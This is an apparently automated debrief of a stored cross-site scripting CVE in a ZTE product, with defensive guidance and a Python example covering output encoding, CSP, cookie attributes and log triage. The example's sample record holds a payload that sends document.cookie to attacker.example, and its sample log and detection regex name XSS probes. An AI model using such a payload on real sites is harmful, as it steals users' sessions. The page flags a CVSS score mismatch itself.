PatchSiren

PatchSiren cyber security CVE debrief

CVE-2026-48999 ZTE CVE debrief

CVE-2026-48999 is a stored cross-site scripting (XSS) vulnerability, classified under CWE-79 (Improper Neutralization of Input During Web Page Generation), with a CVSS 3.1 score of 5.3 (Medium). An attacker who can submit content to the affected product can persist script in pages the product serves; that script then runs in the browser of every user who later views those pages, enabling session hijacking, cookie theft and tampering with page content. Because the payload is stored server-side rather than delivered in a crafted link, it reaches every viewer of the page and needs no per-victim lure that could be spotted, which makes it well suited to data theft campaigns. The vendor is identified as ZTE from PSIRT reference evidence, but that attribution is low confidence and needs review. The CVE was published on 2026-05-27 and currently holds 'Received' status in the NVD. No exploitation in ransomware campaigns has been documented, and the vulnerability is not listed in CISA KEV.

Vendor
ZTE
Product
ZTE ZXUniPOS NDS-LTE
CVSS
MEDIUM 5.7
CISA KEV
Not listed in stored evidence
Original CVE published
2026-05-27
Original CVE updated
2026-05-27
Advisory published
2026-05-27
Advisory updated
2026-05-27

Who should care

Organizations operating ZTE network equipment or software, in particular ZXUniPOS NDS-LTE; security teams responsible for web application security and XSS mitigation; incident response teams monitoring for session hijacking and data exfiltration

Technical summary

Stored cross-site scripting vulnerability allowing persistent malicious script injection with session hijacking and data theft capabilities

Defensive priority

medium

Recommended defensive actions

  • Apply the vendor's fix as soon as it is published; the advisory linked under Official resources is the authoritative source
  • Deploy a Content Security Policy that disallows inline script (nonce- or hash-based script-src) so injected markup cannot execute even if it reaches the page
  • Encode all stored user content at output time with the encoder for the HTML context it lands in; input validation on the way in is a useful second layer but does not by itself stop stored XSS
  • Set the HttpOnly, Secure and SameSite attributes on session cookies so injected script cannot read or exfiltrate the session token
  • Restrict who can submit content through the affected interfaces; the CVSS vector indicates the attacker already needs high privileges, so audit those accounts and their access
  • Alert on submissions containing script tags, event-handler attributes or javascript: URLs in application logs
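The following is an added example, not code from ZTE or from the affected product, showing the three application-side controls above side by side: the vulnerable concatenation pattern next to its output-encoded form, the response headers and cookie attributes that limit what an injected script can do, and a simple triage check over submission logs. The record layout, the log format and the `session` cookie name are assumptions for illustration; the advisory does not describe the affected component.

```python
"""Added example (not ZTE's code): stored-XSS rendering, headers, and a log check.

The record layout, log format and cookie name below are hypothetical; the
advisory for CVE-2026-48999 does not describe the affected component.
"""
import html
import re

# Constructed sample: a "stored" record as it might sit in a database after a
# user with content-submission rights saved it.
STORED_RECORD = {
    "author": "ops",
    "body": '<img src=x onerror="fetch(\'https://attacker.example/?c=\'+document.cookie)">',
}


def render_unsafe(record: dict) -> str:
    """Vulnerable pattern (CWE-79): stored text concatenated straight into HTML."""
    return f"<div class=\"note\"><b>{record['author']}</b>: {record['body']}</div>"


def render_safe(record: dict) -> str:
    """Hardened: HTML-encode at output time, quotes included, so stored text can
    never close the surrounding tag or open a new one."""
    author = html.escape(record["author"], quote=True)
    body = html.escape(record["body"], quote=True)
    return f"<div class=\"note\"><b>{author}</b>: {body}</div>"


def security_headers(nonce: str) -> dict:
    """Response headers that contain an injected script if encoding is missed.
    The nonce must be generated fresh for every response."""
    return {
        "Content-Security-Policy": (
            f"default-src 'self'; script-src 'nonce-{nonce}'; "
            "object-src 'none'; base-uri 'none'; frame-ancestors 'none'"
        ),
        "X-Content-Type-Options": "nosniff",
    }


def session_cookie(value: str) -> str:
    """Set-Cookie value: HttpOnly keeps document.cookie from reading it, Secure
    keeps it off plaintext HTTP, SameSite=Strict blunts cross-site riding."""
    return f"session={value}; Path=/; HttpOnly; Secure; SameSite=Strict"


# Markers that commonly show up when someone probes for XSS. Deliberately noisy:
# this is a triage signal for the SOC, not a blocking filter.
_XSS_MARKERS = re.compile(
    r"<\s*script|javascript:|\bon[a-z]+\s*=|<\s*(img|svg|iframe)\b|document\.cookie",
    re.IGNORECASE,
)

# Constructed submission log lines (hypothetical format: key=value, body last).
SAMPLE_LOG = [
    '2026-05-27T10:00:01Z POST /notes user=alice body="Router rebooted at 09:55"',
    '2026-05-27T10:00:07Z POST /notes user=ops body="<img src=x onerror=alert(1)>"',
    '2026-05-27T10:00:09Z POST /notes user=bob body="see the onboarding doc"',
    '2026-05-27T10:00:12Z POST /notes user=ops body="<a href=javascript:alert(2)>x</a>"',
]


def flag_suspicious_submissions(log_lines):
    """Return the log lines whose body field matches an XSS marker."""
    hits = []
    for line in log_lines:
        m = re.search(r'body="(.*)"$', line)
        if m and _XSS_MARKERS.search(m.group(1)):
            hits.append(line)
    return hits


if __name__ == "__main__":
    print("unsafe:", render_unsafe(STORED_RECORD))
    print("safe:  ", render_safe(STORED_RECORD))
    print(security_headers("r4nd0m")["Content-Security-Policy"])
    print(session_cookie("abc123"))
    for hit in flag_suspicious_submissions(SAMPLE_LOG):
        print("suspicious:", hit)
```

The encoding in `render_safe` is context-specific: it is correct for text and attribute values inside HTML, but content placed into a script block, a URL or a CSS value needs the encoder for that context instead. The CSP is written to work together with the encoding, not replace it; a page that still has legacy inline scripts will need those moved to nonced blocks before the policy can be enforced.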

Evidence notes

Vendor identification is derived from the PSIRT reference domain (support.zte.com.cn) with low confidence and requires verification. The CVSS vector indicates a network attack vector with high attack complexity, high privileges required and user interaction required, which is consistent with a stored XSS reachable only through a privileged submission interface and triggered when another user views the page. The narrative summary reports a CVSS score of 5.3 while the scorecard reports 5.7; reconcile the score against the NVD record once it has been analyzed.

Official resources

2026-05-27